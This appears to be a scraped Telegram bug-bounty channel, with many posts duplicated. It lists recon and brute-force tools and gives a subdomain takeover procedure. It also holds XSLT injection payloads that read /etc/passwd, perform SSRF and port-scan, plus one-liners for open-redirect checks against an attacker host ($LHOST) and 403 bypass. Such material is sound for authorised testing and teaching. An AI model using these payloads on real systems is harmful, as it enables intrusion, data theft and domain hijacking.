🚨Tools collection🚨
Subdomain enum tools we can use!
1. bbot
2. amass
3. crt.sh
4. source codes
5. knockpy
6. subfinder
7. aquatone
8. subdomainzer
9. altDNS
10. Security Trails api
Bruteforcing tools we can use !
1. Go-buster
2. dirsearch
3. ssb - ssh brute
4. Callow -custom tools for logins
5. Ncrack - network
Spidering tools we can use !
1. Spider in Burp
2. Paramspider
3. Scarpy
4. Go_spider
5. aspider
6. ParamPAMPAM
Dir Enum tools we can use !
1. Dirb
2. Gobuster
3. Dirsearch
Wordlists we can use !
1. seclists
2. Assetnote
Subdomain enum tools we can use!
1. bbot
2. amass
3. crt.sh
4. source codes
5. knockpy
6. subfinder
7. aquatone
8. subdomainzer
9. altDNS
10. Security Trails api
Bruteforcing tools we can use !
1. Go-buster
2. dirsearch
3. ssb - ssh brute
4. Callow -custom tools for logins
5. Ncrack - network
Spidering tools we can use !
1. Spider in Burp
2. Paramspider
3. Scarpy
4. Go_spider
5. aspider
6. ParamPAMPAM
Dir Enum tools we can use !
1. Dirb
2. Gobuster
3. Dirsearch
Wordlists we can use !
1. seclists
2. Assetnote
👍14❤7🔥3
This media is not supported in your browser
VIEW IN TELEGRAM
How to find Broken Authentication in 30 seconds or less using Autorize
👉Setup Your Autorize in Burp
1. Proxy traffic through Burp
2. Browse the application
3. Select requests -> Extensions -> Autorize -> Send to Autorize
4. Check the "Unauthenticated" tab and column
👍8🔥2
🌟Load Balancer Takeover🌟
Step 1: Identify .trafficmanager.net subdomains. 🕵️♂️
Step 2: Use your Azure subnoscription to access the Traffic Manager profile. 🌐
Step 3: Create a resource with the vulnerable *.trafficmanager.net cname. 🛠️
Step 4: Add an endpoint for redirection to your desired site. 🔄
Step 1: Identify .trafficmanager.net subdomains. 🕵️♂️
Step 2: Use your Azure subnoscription to access the Traffic Manager profile. 🌐
Step 3: Create a resource with the vulnerable *.trafficmanager.net cname. 🛠️
Step 4: Add an endpoint for redirection to your desired site. 🔄
🔥4❤2👍1
🌟XSLT Server Side Injection🌟
(Extensible Stylesheet Language Transformations) - Part 1
The most used frameworks are: Libxslt (Gnome), Xalan (Apache) and Saxon (Saxonica).
1. Read Local File: read.xsl
<xsl:stylesheet xmlns:xsl="http://w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/>
</xsl:template>
</xsl:stylesheet>
2. SSRF
<xsl:stylesheet xmlns:xsl="http://w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:include href="http://127.0.0.1:8000/xslt"/>
<xsl:template match="/">
</xsl:template>
</xsl:stylesheet>
OR
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl">
</esi:include>
3. Javanoscript Injection
<xsl:stylesheet xmlns:xsl="http://w3.org/1999/XSL/Transform">
<xsl:template match="/">
<noscript>confirm("We're good");</noscript>
</xsl:template>
</xsl:stylesheet>
4. Port Scan
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
<xsl:template match="/">
<xsl:value-of select="document('http://example.com:22')"/>
</xsl:template>
</xsl:stylesheet>
(Extensible Stylesheet Language Transformations) - Part 1
The most used frameworks are: Libxslt (Gnome), Xalan (Apache) and Saxon (Saxonica).
1. Read Local File: read.xsl
<xsl:stylesheet xmlns:xsl="http://w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/>
</xsl:template>
</xsl:stylesheet>
2. SSRF
<xsl:stylesheet xmlns:xsl="http://w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:include href="http://127.0.0.1:8000/xslt"/>
<xsl:template match="/">
</xsl:template>
</xsl:stylesheet>
OR
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl">
</esi:include>
3. Javanoscript Injection
<xsl:stylesheet xmlns:xsl="http://w3.org/1999/XSL/Transform">
<xsl:template match="/">
<noscript>confirm("We're good");</noscript>
</xsl:template>
</xsl:stylesheet>
4. Port Scan
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
<xsl:template match="/">
<xsl:value-of select="document('http://example.com:22')"/>
</xsl:template>
</xsl:stylesheet>
www.php.net
PHP: XSL - Manual
🔥7👍2❤1
This media is not supported in your browser
VIEW IN TELEGRAM
🌟Find JS Endpoints With 1-Click🌟
1. Add a Blank Bookmark on your browser.
2. Add this Regex(https://0-a.nl/jsendpoints.txt) in URL Section.
3. Now open any site and click on your bookmark!
1. Add a Blank Bookmark on your browser.
2. Add this Regex(https://0-a.nl/jsendpoints.txt) in URL Section.
3. Now open any site and click on your bookmark!
🔥9👍2
This media is not supported in your browser
VIEW IN TELEGRAM
Remote Code Execution via Local File Inclusion POC by Abhishek Morla
👏6🔥4
XSS Checks Made Easy 🌐
Example: Execute XSS checks on a list of URLs with a single command.
Uncover Hidden Parameters in Seconds 🕵️♂️
Example: Extract hidden parameters from URLs effortlessly.
Reveal Secrets in JavaScript Files 🕵️♂️
Example: Identify sensitive data in JavaScript files like a pro.
Crush Directories with Effortless Bruteforce 🔍
Example: Discover hidden directories and files effortlessly.
Expose Log4J Vulnerabilities with Ease 🔍
Example: Identify Log4J vulnerabilities on the fly.
Hunt Down Sneaky Open Redirect🎯
Example: Uncover open redirects like a seasoned hunter.
Capture Screenshots in a Snap 📷
Example: Capture screenshots of live websites effortlessly.
Know Your WordPress Version 📝
Example: Discover the WordPress version of a target website instantly.
Unearth Subdomains Containing JavaScript 🌐
Example: Find subdomains with JavaScript files in a snap.
Bypass 403 Login Pages with Finesse 🚪
Example: Bypass 403 login pages like a pro.
Example: Execute XSS checks on a list of URLs with a single command.
One-Liner: cat urls.txt | dalfox pipe --multicast -o xss.txt
Uncover Hidden Parameters in Seconds 🕵️♂️
Example: Extract hidden parameters from URLs effortlessly.
ONE LINER:
cat alive.txt |rush curl -skl “{}” |grep “type\=\”hidden\”” |grep -Eo “name\=\”[^\”]+\”” |cut -d”\”” -f2 | sort -u’ | anew params.txt
Reveal Secrets in JavaScript Files 🕵️♂️
Example: Identify sensitive data in JavaScript files like a pro.
One-Liner:
cat alive.txt | rush 'hakrawler -plain -js -depth 2 -url {}' | rush 'python3 /root/Tools/SecretFinder/SecretFinder.py -i {} -o cli' | anew secretfinder
Crush Directories with Effortless Bruteforce 🔍
Example: Discover hidden directories and files effortlessly.
One-Liner:
cat alive.txt | xargs -I@ sh -c 'ffuf -c -w /path/to/wordlist -D -e php,aspx,html,do,ashx -u @/FUZZ -ac -t 200' | tee -a dir-ffuf.txt
Expose Log4J Vulnerabilities with Ease 🔍
Example: Identify Log4J vulnerabilities on the fly.
One-Liner:
cat alive.txt | xargs -I@ sh -c 'python3 /path/to/log4j-scan.py -u @"
Hunt Down Sneaky Open Redirect🎯
Example: Uncover open redirects like a seasoned hunter.
One-Liner:
gau http://vuln.target.com | gf redirect | qsreplace “$LHOST” | xargs -I % -P 25 sh -c ‘curl -Is “%” 2>&1 | grep -q “Location: $LHOST” && echo “VULN! %”’
Capture Screenshots in a Snap 📷
Example: Capture screenshots of live websites effortlessly.
One-Liner:
assetfinder -subs-only http://target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'
Know Your WordPress Version 📝
Example: Discover the WordPress version of a target website instantly.
One-Liner:
curl -s 'https://target.com/readme.html' | grep 'Version'
Unearth Subdomains Containing JavaScript 🌐
Example: Find subdomains with JavaScript files in a snap.
One-Liner:
echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | anew JS
Bypass 403 Login Pages with Finesse 🚪
Example: Bypass 403 login pages like a pro.
One-Liner:
cat hosts.txt | httpx -path /login -p 80,443,8080,8443 -mc 401,403 -silent -t 300 | unfurl format %s://%d | httpx -path //login -mc 200 -t 300 -nc -silent
👍6🔥3
This media is not supported in your browser
VIEW IN TELEGRAM
🌟Fuzzing and Bypassing the AWS WAF to trigger XSS🌟
👉Tool - https://lnkd.in/gk4-_4yw
👉Blog - https://lnkd.in/g4W7eA7R
👉Tool - https://lnkd.in/gk4-_4yw
👉Blog - https://lnkd.in/g4W7eA7R
❤4🔥2👎1
Bug Bounty Checklist and Cheatsheets
WAPT-https://github.com/KathanP19/HowToHunt/blob/master/CheckList/Web_Checklist_by_Chintan_Gurjar.pdf
Authenication-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/Authentication.pdf
Oauth Misconfiguration-https://binarybrotherhood.io/oauth2_threat_model.html
File Upload-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/File%20Upload.pdf
IDOR-https://notion.so/IDOR-Attack-vectors-exploitation-bypasses-and-chains-0b73eb18e9b640ce8c337af83f397a6b
XSS-https://portswigger.net/web-security/cross-site-noscripting/cheat-sheet
SQLi-https://portswigger.net/web-security/sql-injection/cheat-sheet
XXE-https://link.medium.com/lprTDcXRYgb
SSRF-https://0xn3va.gitbook.io/cheat-sheets/web-application/server-side-request-forgery
2FA-https://drive.google.com/file/d/11FlzxlVw4GIZ60s5v3I1S5p8kXZHExFT/view
CORS-https://0xn3va.gitbook.io/cheat-sheets/web-application/cors-misconfiguration
Business Logic Flaws-https://link.medium.com/MX5hzfESYgb
CSRF-https://book.hacktricks.xyz/pentesting-web/csrf-cross-site-request-forgery
Insecure deserialization-https://thehackerish.com/insecure-deserialization-explained-with-examples/
Web Cache Poisoning-https://0xn3va.gitbook.io/cheat-sheets/web-application/web-cache-poisoning
HTTP request smuggling-https://portswigger.net/web-security/request-smuggling/finding
Command Injection-https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
SAML-https://github.com/e11i0t4lders0n/SAML-SSO
Race Condition-https://pandaonair.com/2020/06/11/race-conditions-exploring-the-possibilities.html
S3 Bucket Misconfiguration-https://medium.com/@janijay007/s3-bucket-misconfiguration-from-basics-to-pawn-6893776d1007
Server-Side Template Injection-https://portswigger.net/research/server-side-template-injection
WebSockets Vulnerabilities-https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages
WAPT-https://github.com/KathanP19/HowToHunt/blob/master/CheckList/Web_Checklist_by_Chintan_Gurjar.pdf
Authenication-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/Authentication.pdf
Oauth Misconfiguration-https://binarybrotherhood.io/oauth2_threat_model.html
File Upload-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/File%20Upload.pdf
IDOR-https://notion.so/IDOR-Attack-vectors-exploitation-bypasses-and-chains-0b73eb18e9b640ce8c337af83f397a6b
XSS-https://portswigger.net/web-security/cross-site-noscripting/cheat-sheet
SQLi-https://portswigger.net/web-security/sql-injection/cheat-sheet
XXE-https://link.medium.com/lprTDcXRYgb
SSRF-https://0xn3va.gitbook.io/cheat-sheets/web-application/server-side-request-forgery
2FA-https://drive.google.com/file/d/11FlzxlVw4GIZ60s5v3I1S5p8kXZHExFT/view
CORS-https://0xn3va.gitbook.io/cheat-sheets/web-application/cors-misconfiguration
Business Logic Flaws-https://link.medium.com/MX5hzfESYgb
CSRF-https://book.hacktricks.xyz/pentesting-web/csrf-cross-site-request-forgery
Insecure deserialization-https://thehackerish.com/insecure-deserialization-explained-with-examples/
Web Cache Poisoning-https://0xn3va.gitbook.io/cheat-sheets/web-application/web-cache-poisoning
HTTP request smuggling-https://portswigger.net/web-security/request-smuggling/finding
Command Injection-https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
SAML-https://github.com/e11i0t4lders0n/SAML-SSO
Race Condition-https://pandaonair.com/2020/06/11/race-conditions-exploring-the-possibilities.html
S3 Bucket Misconfiguration-https://medium.com/@janijay007/s3-bucket-misconfiguration-from-basics-to-pawn-6893776d1007
Server-Side Template Injection-https://portswigger.net/research/server-side-template-injection
WebSockets Vulnerabilities-https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages
👍10🔥4❤3
🌟Find Waybackurls JS Endpoints With 1-Click🌟
1. Add a Blank Bookmark on your browser.
2. Add this Regex in URL Section.
3. Now open any site and click on your bookmark!
1. Add a Blank Bookmark on your browser.
2. Add this Regex in URL Section.
javanoscript:(function() { var currentURL = encodeURIComponent(window.location.hostname.replace(/^www\./, '')); var newURL = 'https://web.archive.org/cdx/search/cdx?url=%27 + currentURL; window.open(newURL, %27_blank%27);})();3. Now open any site and click on your bookmark!
❤13🔥3👍1